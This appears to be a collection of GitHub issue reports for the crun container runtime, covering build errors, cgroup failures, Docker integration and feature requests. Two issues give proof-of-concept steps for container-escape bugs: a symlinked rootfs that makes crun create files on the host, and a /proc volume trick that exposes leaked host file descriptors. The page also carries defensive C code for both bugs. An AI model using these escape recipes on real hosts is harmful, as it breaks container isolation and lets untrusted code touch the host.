containers / crun
A fast and lightweight fully featured OCI runtime and C library for running containers
License: GNU General Public License v2.0
I am running configure --with-python-bindings on Ubuntu 19.10, and the configure fails because it is unable to locate the python3 headers.
As far as I could understand, the problem is related to:
PKG_CHECK_MODULES([PYTHON], [python], [], [AC_MSG_ERROR([*** python headers not found])])
On Ubuntu 19.10 the python3 pkg-config file is python3.pc; CHECK_MODULE searches only for "python.pc".
To be compatible with runC, we need to look up argv[0] in $PATH once we are in the new mount namespace, so that start can fail immediately if the specified command doesn't exist.
/kind bug
$ podman --version
podman version 1.6.1
The following command fails with rootless podman.
$ podman run --rm -v /dev:/dev -it fedora /bin/bash
Error: container_linux.go:346: starting container process caused "process_linux.go:449: container init caused \"open /dev/console: permission denied\"": OCI runtime permission denied error
The current workaround is:
$ podman run --rm -v /dev:/dev -i fedora /bin/bash
$ podman exec -it `podman ps -q` /bin/bash
How to report vulnerabilities should be clarified in the document.
While following the provided directions to build a static image, I get the following error:
$ sudo make -C contrib/static-builder-x86_64 build-image
make: Entering directory '/home/kittyhacker101/test/crun/contrib/static-builder-x86_64'
podman build -t crun-builder .
STEP 1: FROM fedora AS base
Getting image source signatures
Copying blob a83dac7d1094 done
Copying config 21304c8f88 done
Writing manifest to image destination
Storing signatures
Getting image source signatures
Copying blob 22457ad8e7df done
Copying config 6a76f80daa done
Writing manifest to image destination
Storing signatures
Error: error creating build container: The following failures happened while trying to pull image specified by "fedora" based on search registries in /etc/containers/registries.conf:
* "localhost/fedora": Error initializing source docker://localhost/fedora:latest: pinging docker registry returned: Get https://localhost/v2/: dial tcp [::1]:443: connect: connection refused
* "docker.io/library/fedora": Error committing the finished image: error adding layer with blob "sha256:a83dac7d1094257f061af9dd1d3963e1708ee568c584a22007febbb8b249fa1e": Error processing tar file(exit status 1): Error cleaning up after pivot: remove /.pivot_root929792229: device or resource busy
* "registry.fedoraproject.org/fedora": Error committing the finished image: error adding layer with blob "sha256:22457ad8e7df49c0981e036f095173263c328867ba6b7f7a35e9bcbf5ee8fc60": Error processing tar file(exit status 1): Error cleaning up after pivot: remove /.pivot_root707258341: device or resource busy
* "quay.io/fedora": Error initializing source docker://quay.io/fedora:latest: Error reading manifest latest in quay.io/fedora: error parsing HTTP 404 response body: invalid character '<' looking for beginning of value: "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n"
* "registry.access.redhat.com/fedora": Error initializing source docker://registry.access.redhat.com/fedora:latest: Error reading manifest latest in registry.access.redhat.com/fedora: name unknown: Repo not found
* "registry.centos.org/fedora": Error initializing source docker://registry.centos.org/fedora:latest: Error reading manifest latest in registry.centos.org/fedora: manifest unknown: manifest unknown
make: *** [Makefile:13: build-image] Error 125
make: Leaving directory '/home/kittyhacker101/test/crun/contrib/static-builder-x86_64'
I'm using the latest commit (a4440eb), I have Podman 1.4.3 installed, and I'm using Manjaro Linux.
runc logs errors to both the log file and stderr for errors that are returned via main(), and some programs depend on these error messages.
https://github.com/opencontainers/runc/blob/master/main.go#L156
We should probably do the same in crun.
$ sudo crun list
cannot opendir '/run/crun': No such file or directory
$ crun list
cannot opendir '/run/user/1000/crun': No such file or directory
Perhaps crun should automatically create the directory when required.
Hey there,
Is it possible to integrate crun as a "runtime" in Docker to use its ecosystem?
Like runsc from gvisor: https://github.com/google/gvisor
Adding it to the daemon.json like gvisor or something:
{
  "runtimes": {
    "runsc": {
      "path": "/usr/local/bin/runsc"
    }
  }
}
Being able to use it like this:
docker run --runtime=crun --rm hello-world
It seems that the YAJL_CFLAGS etc. found via pkg-config are not used for the actual compilation. I got it to work by appending them to all the *_CFLAGS in Makefile.am and libocispec/Makefile.am, but I'm not an expert in autotools and I'm not sure if that's the best approach.
I'm building v0.9.1, and I'm seeing this compilation error:
CC src/libcrun/libcrun_la-seccomp.lo
src/libcrun/seccomp.c: In function ‘libcrun_apply_seccomp’:
src/libcrun/seccomp.c:123:13: error: ‘SECCOMP_FILTER_FLAG_LOG’ undeclared (first use in this function)
flags = SECCOMP_FILTER_FLAG_LOG|SECCOMP_FILTER_FLAG_SPEC_ALLOW;
^
src/libcrun/seccomp.c:123:13: note: each undeclared identifier is reported only once for each function it appears in
src/libcrun/seccomp.c:123:37: error: ‘SECCOMP_FILTER_FLAG_SPEC_ALLOW’ undeclared (first use in this function)
flags = SECCOMP_FILTER_FLAG_LOG|SECCOMP_FILTER_FLAG_SPEC_ALLOW;
^
Looks like these flags are new since linux 4.14/4.17. Can we add something to switch based on seccomp version? Is this safe at runtime, if for example I run a static container-built binary on an older kernel? If not, maybe we also need runtime checks.
crun follows symlinks when creating mount points, allowing a malicious container to create arbitrary empty files in the host filesystem.
runc resolves the symlink relative to the container rootfs using SecureJoin and creates /opt/resolv.conf inside the container instead.
/CC @giuseppe @rhatdan @cyphar
mkdir -p rootfs/etc
ln -s /opt/resolv.conf rootfs/etc/resolv.conf
cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /
EOF
podman build -t poc --no-cache .
podman run --runtime=crun poc
ls -lisaZ /opt
# 133154 0 -rwx------. 1 root root unconfined_u:object_r:usr_t:s0 0 Sep 29 16:47 resolv.conf
Works with SELinux on.
Tested with crun at 66cd22c and podman 1.5.1 on Fedora 30.
(--no-cache is required when playing with the POC due to containers/buildah#1875)
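One way to close this class of bug is to resolve the container-supplied path the way the report says runc does: walk it component by component and re-root every symlink target at the rootfs, so an absolute link target can never point at the host. The block below is an added example written for this page, not crun's or runc's code; the names secure_join, make_poc_rootfs and join_yields are my own, and it assumes Linux with readlink, mkdtemp and symlink available.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define MAX_LINKS 255 /* bound on symlink hops, like the kernel's ELOOP limit */
/* Resolve unsafe_path as if root were "/": each symlink met on the way is read and
 * re-resolved relative to root, so an absolute target such as /opt/resolv.conf
 * becomes root/opt/resolv.conf, never the host's.  0 on success, -1 with errno. */
int secure_join (const char *root, const char *unsafe_path, char *out, size_t outlen)
{
  char rel[PATH_MAX] = "";                       /* resolved part, relative to root */
  char rest[PATH_MAX], comp[PATH_MAX], full[PATH_MAX], target[PATH_MAX], tmp[PATH_MAX];
  int links = 0;
  if (snprintf (rest, sizeof rest, "%s", unsafe_path) >= PATH_MAX) goto toolong;
  while (rest[0] != '\0') {
    char *p = rest;                              /* peel off the first component */
    while (*p == '/') p++;
    char *slash = strchr (p, '/');
    size_t clen = slash ? (size_t) (slash - p) : strlen (p);
    memcpy (comp, p, clen); comp[clen] = '\0';
    memmove (rest, p + clen, strlen (p + clen) + 1);
    if (clen == 0 || strcmp (comp, ".") == 0) continue;
    if (strcmp (comp, "..") == 0) {              /* ".." at the rootfs root stays there */
      char *last = strrchr (rel, '/');
      if (last) *last = '\0';
      continue;
    }
    if (snprintf (full, sizeof full, "%s%s/%s", root, rel, comp) >= PATH_MAX) goto toolong;
    ssize_t n = readlink (full, target, sizeof target - 1);
    if (n < 0) {
      /* EINVAL: exists but is not a symlink; ENOENT: not created yet.  Both are
       * plain components.  Anything else (ENOTDIR, EACCES, ...) is a real error. */
      if (errno != EINVAL && errno != ENOENT) return -1;
      if (strlen (rel) + 1 + clen >= sizeof rel) goto toolong;
      strcat (rel, "/"); strcat (rel, comp);
      continue;
    }
    if ((size_t) n >= sizeof target - 1 || ++links > MAX_LINKS) { errno = ELOOP; return -1; }
    target[n] = '\0';
    /* Push the link target back in front of what is left.  An absolute target
     * restarts from the rootfs root, not from the host root. */
    if (target[0] == '/') rel[0] = '\0';
    if (snprintf (tmp, sizeof tmp, "%s/%s", target, rest) >= PATH_MAX) goto toolong;
    memcpy (rest, tmp, strlen (tmp) + 1);
  }
  if (snprintf (out, outlen, "%s%s", root, rel) >= (int) outlen) goto toolong;
  return 0;
toolong:
  errno = ENAMETOOLONG;
  return -1;
}

/* Constructed fixture mirroring the report: a throw-away rootfs in which
 * etc/resolv.conf is a symlink to the absolute path /opt/resolv.conf.
 * Created once; returns the rootfs path, or NULL on failure. */
const char *make_poc_rootfs (void)
{
  static char root[] = "/tmp/securejoin-XXXXXX", *made = NULL;
  char path[PATH_MAX];
  if (made || mkdtemp (root) == NULL) return made;
  snprintf (path, sizeof path, "%s/etc", root);
  if (mkdir (path, 0700) < 0) return NULL;
  snprintf (path, sizeof path, "%s/etc/resolv.conf", root);
  return symlink ("/opt/resolv.conf", path) < 0 ? NULL : (made = root);
}

/* 1 if resolving path inside root gives exactly root + expected_rel, else 0. */
int join_yields (const char *root, const char *path, const char *expected_rel)
{
  char out[PATH_MAX];
  if (root == NULL || secure_join (root, path, out, sizeof out) < 0) return 0;
  return strncmp (out, root, strlen (root)) == 0 && strcmp (out + strlen (root), expected_rel) == 0;
}
```

Lexical resolution like this is still exposed to a container that rewrites the link between the check and the mount; on Linux 5.6 and later, openat2() with RESOLVE_IN_ROOT performs the same scoping atomically in the kernel.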
When running as a rootless user, honor the user.rootlesscontainers xattrs and emulate them through a seccomp user-space trap: https://lwn.net/Articles/756167/
I am not sure there is a requirement to keep complete CLI compatibility with runc; if that is not the case, it would be interesting to have "crun list -a" to be able to list non-started containers.
This would be somehow equivalent to "docker ps -a".
Currently it is hard to understand/debug scenarios like the following:
$ crun create my_own_id
2019-11-08T13:51:42.000586462Z: use --console-socket with create when a terminal is used
~/tmp/test
$ crun create my_own_id
2019-11-08T13:51:45.000322611Z: container 'my_own_id' already exists
$ crun list
NAME PID STATUS BUNDLE PATH
~/tmp/test
I keep getting this when I try to create a container:
level=error msg="Container creation error: writing file 'cpu.shares': Bad file descriptor
ls /sys/fs/cgroup/cpu/kubepods/burstable/pod7f8667b0aa2fc59394329cc63d147fc3/
cgroup.clone_children crio-conmon-018a9e0c4d02ed0ac3acadcb240df7d7e718a6264af811930048f75b55d16a58 crio-conmon-845ae88564fc18e50064223a1cefd85536d0a105fd6a50d14ca48a55be936114
cgroup.procs crio-conmon-031f3ac376b34d2eecec24f263fcfd800091ad001013852ba42ecd4a5a2595e4 crio-conmon-a537c8308319eb1ab7710b9c4c4f1a590ae47c013dc38876908c8e3a7e070dbb
cpu.cfs_period_us crio-conmon-3816120e55090b077cbdf75b62696b1e58b2655b8ee5165f28662cb9c165e3e3 crio-conmon-b4d592875062642b8627445dc26a9b80556442a8879f8deeb7be43a0d3f51c33
cpu.cfs_quota_us crio-conmon-3aab6d526c5d97b401b287b6ecd28de911919940892b9a7a68e5adfdb969e57e crio-conmon-c2295e785211b185f5726c647a24841cc3e444d4ca7bd0c7e29be87794f007c3
cpu.rt_period_us crio-conmon-41c02b86cf760effc235e0b6498b45723102d23ce1daffa7cbd926ce0bd55da6 crio-conmon-d21d06f567283e6de85e51f0b87ad796fbca5f4dc397ab4748e2ae66bde5956e
cpu.rt_runtime_us crio-conmon-468e517c34b9c0c9a4b466cbd00c89f859e00ee6b01fc89db54cd4bfa5c44499 crio-conmon-d8996193794ec44cde3dc14125f0481b5f6d4ec998dc1e6ac00d09ad4f002792
cpu.shares crio-conmon-4cc0b934f3393dd33a40310ba09d6e3c9c0c2a498cfd1ceee8ac45d8d2201ba7 notify_on_release
cpu.stat crio-conmon-7fcf8b268ab7050a1d4b2ee330aa4397169b60a431174ce463dff2a2d1096a21 tasks
Notice crio-UUID is missing
cat /sys/fs/cgroup/cpu/kubepods/burstable/pod7f8667b0aa2fc59394329cc63d147fc3/cpu.shares
256
The folder is there but it is empty.
crun should support checkpointing and restoring running containers.
On Fedora 31, /proc/self/cgroup output is different after 'mock' is run on the host, I'm guessing due to systemd-nspawn usage. The new output confuses podman+crun, as well as libvirt.
Before
$ cat /proc/self/cgroup
0::/user.slice/user-1000.slice/...
After mock:
$ cat /proc/self/cgroup
1:name=systemd:/
0::/user.slice/user-1000.slice/...
$ podman run --rm -it alpine sh
Error: creating cgroup directory '/sys/fs/cgroup/name=systemd/user.slice/user-1000.slice/[email protected]/user.slice/libpod-498cc4ceeee46ea3a04a12b8e495989c92074ae1513081332fed5312a2d9dc68.scope': Permission denied: OCI runtime error
I'm not sure if the cgroup behavior is intentional or not, hence the systemd bug I filed. The kernel docs do say that it is valid for other cgroups to be listed there, but they are v1 cgroups and not v2: https://www.kernel.org/doc/html/v5.3/admin-guide/cgroup-v2.html#processes
Below is a patch that 'fixes' crun usage for me, by only attempting to create the cgroup subdirectory for the cgroupv2 root path, ignoring everything else, in this case the name=systemd cgroup. But again I'm not sure if that's correct or not. If it is I will send a PR.
diff --git a/src/libcrun/cgroup.c b/src/libcrun/cgroup.c
index 30ec248..77d3f4f 100644
--- a/src/libcrun/cgroup.c
+++ b/src/libcrun/cgroup.c
@@ -494,6 +494,10 @@ int systemd_finalize (oci_container_linux_resources *resources, int cgroup_mode,
subpath = strchr (subsystem, ':') + 1;
*(subpath - 1) = '\0';
+ /* Only process cgroupv2, which will have no listed subsystem */
+ if (strcmp(subsystem, ""))
+ continue;
+
if (strcmp (subpath, *path))
{
ret = enter_cgroup_subsystem (pid, subsystem, *path, 1, err);
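Review bot: the new `if (strcmp(subsystem, "")) continue;` skips every line of /proc/self/cgroup that names a subsystem unconditionally, yet systemd_finalize takes a cgroup_mode argument (see the hunk header); on a host running pure cgroup v1 every line carries a subsystem name, so nothing would ever reach enter_cgroup_subsystem and the process would not be moved into its cgroup at all. The skip should be gated on the unified/v2 mode, e.g. `if (cgroup_mode == <the v2 mode constant used in cgroup.c> && subsystem[0] != '\0') continue;`, and the call should follow the file's `strcmp (a, b)` spacing as used two lines below.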
In the runc era, there is a test suite called runctst that has matured in testing on RHEL and occasionally Fedora, and which depends only on skopeo and python3-psutils.
crun has its own similar tests, which seem to have less coverage than runctst. Do you think it makes sense to merge runctst into the crun tests to have one single Python file that could be used for regression testing?
Should be added to dependencies (fresh build environment inside of an Ubuntu Docker container):
autoconf (./autogen.sh: 9: exec: autoreconf: not found)
python3 (configure: error: no suitable Python interpreter found)
The message below makes me think this is an issue between cgroups & runc. I'm not sure if this is the cause or symptomatic of something else.
STEP 1: FROM registry.access.redhat.com/ubi8
STEP 2: ADD --chown=1000:1000 ocp4 /ocp4
c9cd957f1685bbc1addeb9a8296ee140bc3ff14f116f09f793d95e4d5b658745
STEP 3: RUN yum install -y openssh-clients sudo; yum -y clean all
WARN[0000] signal: killed
ERRO[0000] container_linux.go:346: starting container process caused "process_linux.go:297: applying cgroup configuration for process caused "mountpoint for cgroup not found""
container_linux.go:346: starting container process caused "process_linux.go:297: applying cgroup configuration for process caused "mountpoint for cgroup not found""
error running container: error creating container for [/bin/sh -c yum install -y openssh-clients sudo; yum -y clean all]: : exit status 1
Error: error building at STEP "RUN yum install -y openssh-clients sudo; yum -y clean all": error while running runtime: exit status 1
It would be great to have proper documentation on what resources are supported and unsupported in cgroup2 mode.
To run inside of a ramdisk, is the --no-pivot option needed?
--no-pivot do not use pivot root to jail process inside rootfs. This should be used whenever the rootfs is on top of a ramdisk
crun list misses the running / stopped state of containers as shown with runc.
Would it be possible to add it?
Had a problem with tmpfs inside of a container and did not notice it until I tried to enter it (crun exec <NAME> <CMD>).
$ docker run -it --rm alpine:3.10
# apk -U add git gcc yajl-dev libc-dev linux-headers argp-standalone libtool automake autoconf make libcap-dev python3 libseccomp-dev
# git clone https://github.com/containers/crun && cd crun
[...]
# ./autogen.sh && ./configure && make
[...]
make[3]: Entering directory '/root/crun/libocispec'
CC src/validate.o
src/validate.c:23:10: fatal error: error.h: No such file or directory
#include <error.h>
^~~~~~~~~
compilation terminated.
make[3]: *** [Makefile:873: src/validate.o] Error 1
make[3]: Leaving directory '/root/crun/libocispec'
make[2]: *** [Makefile:680: all] Error 2
make[2]: Leaving directory '/root/crun/libocispec'
make[1]: *** [Makefile:1475: all-recursive] Error 1
make[1]: Leaving directory '/root/crun'
make: *** [Makefile:756: all] Error 2
I have podman 1.6.1 on a fc30 and fc31 host running rootless.
podman run --rm -it bitwardenrs/server:alpine
starts and runs on fc30 with runc, but failed to run on fc31. The error message is:
Error: executable file not found in $PATH: No such file or directory: OCI runtime command not found error
So I tried
podman run --rm -it bitwardenrs/server:alpine /bitwarden_rs
When running a rootless OCI spec and no uid mappings are set, a specific error message should be displayed. Now it fails with a mount error.
How to reproduce:
$ sudo mv /etc/subuid /etc/subuid.off
$ sudo mv /etc/subgid /etc/subgid.off
$ crun run config.json
2019-11-08T13:14:26.000942292Z: mount 'devpts' to '/home/jpinto/tmp/rootfs/dev/pts': Invalid argument
~/tmp
The behavior from runc:
$ runc run config.json
ERRO[0000] User namespaces enabled, but no uid mappings found.
User namespaces enabled, but no uid mappings found.
I'm installing crun as a non-root user to a local directory: Go stuff goes into /home/podman/go and installed stuff into /home/podman/usr/. After make install I'm getting this:
/bin/mkdir -p '/home/podman/usr/local/lib'
/bin/bash ./libtool --mode=install /usr/bin/install -c libcrun.la '/home/podman/usr/local/lib'
libtool: install: /usr/bin/install -c .libs/libcrun.lai /home/podman/usr/local/lib/libcrun.la
libtool: install: /usr/bin/install -c .libs/libcrun.a /home/podman/usr/local/lib/libcrun.a
libtool: install: chmod 644 /home/podman/usr/local/lib/libcrun.a
libtool: install: ranlib /home/podman/usr/local/lib/libcrun.a
libtool: warning: remember to run 'libtool --finish /usr/local/lib'
The last warning gives me a little bellyache. Libtool is somewhere (found it in /home/go/src/github.com/containers/crun/libtool) and /usr/local/lib is missing the prefix.
Sure, this is a special case, but maybe a bug for others, too. But hmm, why do I need to run libtool manually at all?
I use https://github.com/genuinetools/img to pull / unpack images and it fails with:
/ # img pull alpine
Error: unable to check runc version
It checks runc version first... :(
crun --version
crun 0.7
spec: 1.0.0
+SELINUX +CAP +SECCOMP +EBPF +YAJL
runc --version
runc version spec: 1.0.1-dev
# podman run --uidmap=0:100000:5000 fedora mount | grep sysrq
Versus
# podman run fedora mount | grep sysrq
proc on /proc/sysrq-trigger type proc (ro,relatime)
I modify libpod.conf to use runc.
# podman run --uidmap=0:100000:5000 fedora mount | grep sysrq
proc on /proc/sysrq-trigger type proc (ro,relatime)
If I try to run toolbox create followed by podman start fedora-toolbox-31, I get the following error (which is supposedly from crun):
Error: unable to start container "fedora-toolbox-31": cannot configure rootless cgroup using the cgroupfs manager
cannot set limits without cgroups: OCI runtime error
crun-0.10-1.fc31.x86_64 https://koji.fedoraproject.org/koji/buildinfo?buildID=1393143
crun @ b86fb1a does not seem to work with the latest Docker
$ docker run -it --rm --runtime=crun busybox
docker: Error response from daemon: OCI runtime create failed: seccomp_rule_add: unknown.
$ docker info
Client:
Debug Mode: false
Server:
Containers: 0
Running: 0
Paused: 0
Stopped: 0
Images: 26
Server Version: dev
Storage Driver: overlay2
Backing Filesystem: extfs
Supports d_type: true
Native Overlay Diff: true
Logging Driver: json-file
Cgroup Driver: cgroupfs
Plugins:
Volume: local
Network: bridge host ipvlan macvlan null overlay
Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
Swarm: inactive
Runtimes: crun kata runc runnc runsc runsc-kvm
Default Runtime: runc
Init Binary: docker-init
containerd version: 894b81a4b802e4eb2a91d1ce216b8817763c29fb
runc version: 8011af4a96d657f5ab1cff56273308dd1e13c9eb
init version: fec3683
Security Options:
apparmor
seccomp
Profile: default
Kernel Version: 4.15.0-47-generic
Operating System: Ubuntu 18.04.2 LTS
OSType: linux
Architecture: x86_64
CPUs: 2
Total Memory: 7.767GiB
Name: suda-ws01
ID: b95a52c4-8aa3-4a34-ac17-f6e0644e95cc
Docker Root Dir: /var/lib/docker
Debug Mode: true
File Descriptors: 22
Goroutines: 44
System Time: 2019-04-11T20:41:22.566149249+09:00
EventsListeners: 0
Username: akihirosuda
Registry: https://index.docker.io/v1/
Labels:
Experimental: true
Insecure Registries:
127.0.0.0/8
Live Restore Enabled: false
WARNING: No swap limit support
$ docker version
Client:
Version: 19.03.0-dev
API version: 1.40
Go version: go1.12.2
Git commit: ac758d9f
Built: Thu Apr 11 11:35:42 2019
OS/Arch: linux/amd64
Experimental: true
Server:
Engine:
Version: dev
API version: 1.40 (minimum version 1.12)
Go version: go1.12.3
Git commit: fc52433fa6
Built: Thu Apr 11 11:34:56 2019
OS/Arch: linux/amd64
Experimental: true
containerd:
Version: v1.2.6
GitCommit: 894b81a4b802e4eb2a91d1ce216b8817763c29fb
runc:
Version: 1.0.0-rc6+dev
GitCommit: 8011af4a96d657f5ab1cff56273308dd1e13c9eb
docker-init:
Version: 0.18.0
GitCommit: fec3683
crun doesn't work with the latest moby seccomp profile because crun doesn't support io_uring_enter.
Docker is reporting error on parsing crun version:
Aug 28 09:24:08 fedora-unleashed dockerd[2639]: time="2019-08-28T09:24:08.085535495-03:00" level=warning msg="failed to parse /usr/local/bin/crun version: unknown output format: crun 0.7\nspec: 1.0.0\n+SYSTEMD +SELINUX +CAP +SECCOMP +EBPF +YAJL\n"
Docker is configured like this:
{
  "default-runtime": "crun",
  "debug": false,
  "max-concurrent-uploads": 1,
  "runtimes": {
    "crun": {
      "path": "/usr/local/bin/crun",
      "runtimeArgs": [
        "--debug"
      ]
    }
  }
}
Didn't look into the code yet but it's a reproducer in 100 percent of the cases.
I feel my eyes are suffering because the current code style uses 2-space indentation. None of the successful projects I am aware of are using this style. Could we adopt something like the kernel style or another well-known one?
The logging (src/libcrun/error.c) is currently a mess; it needs to be simplified and polished.
Moby depends on the runc ps command for the docker top implementation.
Host: Arch Linux x86_64
Crun version: 0.9.1
How to reproduce:
podman run --runtime=/usr/bin/crun -it --rm i386/debian:stable-slim
Result:
Sep 18 22:04:47 arch systemd-coredump[39094]: Process 39086 (bash) of user 1000 dumped core.
Stack trace of thread 1:
#0 0x00000000f7f08735 n/a (/lib/i386-linux-gnu/ld-2.28.so)
Works fine with the default runtime (runc).
$HOME is a missing environment variable in running container with crun:
podman run --name bb -ti docker.io/library/busybox sh
/ # env
HOSTNAME=77fcb215cce2
SHLVL=1
container=podman
TERM=xterm
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
With runc:
podman run --name bb -ti docker.io/library/busybox sh
/ # env
HOSTNAME=7913850b674c
SHLVL=1
HOME=/root
container=podman
TERM=xterm
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
Under musl libc, stderr is defined as (stderr) in stdio.h, which breaks crun and libocispec because there's a stderr member in the context structure.
Per ISO C99, this is legal: stderr is allowed to be a macro (see discussion here: http://lists.llvm.org/pipermail/llvm-commits/Week-of-Mon-20130506/173524.html). So, the use of stderr as a structure member is not valid.
Error: cannot set limits without cgroups: OCI runtime error
So I tried using crun on CentOS 8 on a frankensystem with RPMs from Fedora 30 to get newer podman/conmon and crun
Version: 1.6.3-dev
RemoteAPI Version: 1
Go Version: go1.13.4
Git Commit: 8e5aad97dda150f8e871c1b394824496f4b849ea
Built: Mon Nov 4 23:51:26 2019
OS/Arch: linux/amd64
I am getting
podman run --rm -it --name tmp_101 centos:8
container create failed: cannot set limits without cgroups
The cgroup_manager is "systemd".
# rpm -q conmon podman crun
conmon-2.0.2-1.el8.x86_64
podman from master branch containers/libpod
crun-0.10.2-1.fc30.x86_64
Add support for SD_NOTIFY when using crun create and crun start.
The current logic for handling NOTIFY_SOCKET must be changed so that we bind mount the parent directory of the notify socket. In this way "start" can create the socket that will still be accessible from the container, since the parent directory is mounted.
Line 1647 in 6365276
If I understand the spec correctly, the "rwm" flag can also be written as "mwr":
https://github.com/opencontainers/runtime-spec/blob/v1.0.1/config-linux.md#device-whitelist
As discussed on IRC, creating a separate tracking bug for crun. Same issue as opencontainers/runc#2128, same PoC with crun runtime.
See #109
runc has no dangerous fds to leak, but crun does, allowing for an easy escape:
mkdir -p rootfs/proc/self/fd
touch rootfs/proc/self/fd/{4,5}
cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /
VOLUME /proc
EOF
docker build -t poc .
docker run --runtime=crun --name poc poc sleep inf &
lsof -p $(pidof sleep)
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
sleep 12215 root cwd DIR 0,126 4096 927459 /
sleep 12215 root rtd DIR 0,126 4096 927459 /
sleep 12215 root txt REG 0,126 1132888 397156 /bin/sleep
sleep 12215 root mem REG 252,1 397156 /bin/sleep (path inode=11903)
sleep 12215 root 0r CHR 1,3 0t0 11168 /dev/null
sleep 12215 root 1w FIFO 0,12 0t0 571231 pipe
sleep 12215 root 2w FIFO 0,12 0t0 571232 pipe
sleep 12215 root 3u unix 0xffff993efdcf9c00 0t0 571223 @/containerd-shim/moby/aa7dd60d6ee454d873da9ebd452257e51d340a3d6aa1009c90afd5825f442690/shim.sock@ type=STREAM
sleep 12215 root 4u REG 0,24 0 572760 /run/containerd/io.containerd.runtime.v1.linux/moby/aa7dd60d6ee454d873da9ebd452257e51d340a3d6aa1009c90afd5825f442690/log.json
sleep 12215 root 6r FIFO 0,12 0t0 572766 pipe
sleep 12215 root 7w FIFO 0,12 0t0 572766 pipe
sleep 12215 root 8u REG 0,24 7632 571234 /run/docker/runtime-crun/moby/aa7dd60d6ee454d873da9ebd452257e51d340a3d6aa1009c90afd5825f442690/seccomp.bpf
sleep 12215 root 9r REG 0,3 0 4026531992 /run/docker/netns/default
podman specifies the volume mount first and then /proc, so it's not affected.
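The lsof listing shows host-side handles (the containerd log.json, the seccomp.bpf file, the netns fd) still open in the container's init process. A defensive check a runtime can run on itself just before execve() is to enumerate /proc/self/fd and flag, or mark close-on-exec, anything that lacks FD_CLOEXEC. The block below is an added example written for this page, not crun's code; find_inheritable_fds, seal_inheritable_fds and demo_leak_check are my own names, and it assumes Linux with /proc mounted.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Store in out[] (up to max) every fd >= min_fd that lacks FD_CLOEXEC and would
 * therefore survive execve() into the container payload.  Returns the number
 * found (the true count, even when larger than max), or -1 on error. */
int find_inheritable_fds (int min_fd, int *out, size_t max)
{
  DIR *d = opendir ("/proc/self/fd");
  if (d == NULL) return -1;
  int found = 0;
  struct dirent *e;
  while ((e = readdir (d)) != NULL) {
    char *end;
    long fd = strtol (e->d_name, &end, 10);
    if (*end != '\0' || fd < min_fd || fd == dirfd (d)) continue;  /* ".", "..", our DIR */
    int flags = fcntl ((int) fd, F_GETFD);
    if (flags < 0 || (flags & FD_CLOEXEC)) continue;
    if ((size_t) found < max) out[found] = (int) fd;
    found++;
  }
  closedir (d);
  return found;
}

/* Mark every inheritable fd >= min_fd close-on-exec.  A runtime would call this
 * right before execve() so that no host-side handle is reachable from inside
 * the container.  Returns how many descriptors were fixed, or -1. */
int seal_inheritable_fds (int min_fd)
{
  int fds[1024];
  int n = find_inheritable_fds (min_fd, fds, 1024);
  if (n < 0) return -1;
  if (n > 1024) n = 1024;
  for (int i = 0; i < n; i++)
    if (fcntl (fds[i], F_SETFD, FD_CLOEXEC) < 0) return -1;
  return n;
}

static int contains (const int *fds, int n, int fd)
{
  for (int i = 0; i < n; i++)
    if (fds[i] == fd) return 1;
  return 0;
}

/* Self-check: a deliberately leaked fd must be reported before sealing and be
 * gone afterwards.  Returns 0 on success, a negative step number otherwise. */
int demo_leak_check (void)
{
  int fds[1024], rc = 0;
  int leaked = open ("/dev/null", O_RDONLY);   /* no O_CLOEXEC: the bug class above */
  if (leaked < 0) return -1;
  int before = find_inheritable_fds (3, fds, 1024);
  if (before < 1 || !contains (fds, before > 1024 ? 1024 : before, leaked)) rc = -2;
  else if (seal_inheritable_fds (3) < 1) rc = -3;
  else {
    int after = find_inheritable_fds (3, fds, 1024);
    if (after < 0 || contains (fds, after > 1024 ? 1024 : after, leaked)) rc = -4;
  }
  close (leaked);
  return rc;
}

int main (void)
{
  int fds[64];
  int n = find_inheritable_fds (3, fds, 64);
  printf ("%d inheritable fd(s) >= 3 before sealing\n", n);
  for (int i = 0; i < n && i < 64; i++) printf ("  fd %d\n", fds[i]);
  return demo_leak_check () == 0 ? 0 : 1;
}
```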
When trying to run crun with arguments in the wrong order, it does not work, but the error message is not so clear:
$ ./crun create containerid --bundle /home/alban/oci/c1
2018-03-09T17:54:33.000102555Z: error loading config.json
When using the correct order (./crun create --bundle /home/alban/oci/c1 containerid), it works.
I found this issue when trying to run the OCI runtime validation tests.
runtime-tools seems to do the wrong thing here (I just filed opencontainers/runtime-tools#600) according to the CLI spec. But maybe the crun arguments parsing could be made more flexible, or improve the error message somehow?
I'm struggling to learn how to use Crun. Is there an intro with examples how to run a container, etc.?
Thanks.
Hi,
Thank you for crun: it's really, really much faster than runc ... 🥇
I'm actually using it in 2 little kubernetes/cri-o clusters and with podman.
I wrote an ebuild (Gentoo package: https://bugs.gentoo.org/687202) for the integration in my OS but the tag 0.5 is currently broken at execution with podman, some error like 'Bad argument[...]' , but it works fine with the commit f81874f.
Please could you do another tag?
I tried ./configure LDFLAGS=-static but it did not produce a static binary.
I would like to try crun as a Docker runtime. How can I set it up to use it with the docker run option --runtime=crun?
I currently tried kata with --runtime=kata-runtime and find it quite interesting. It would be nice to try crun, too.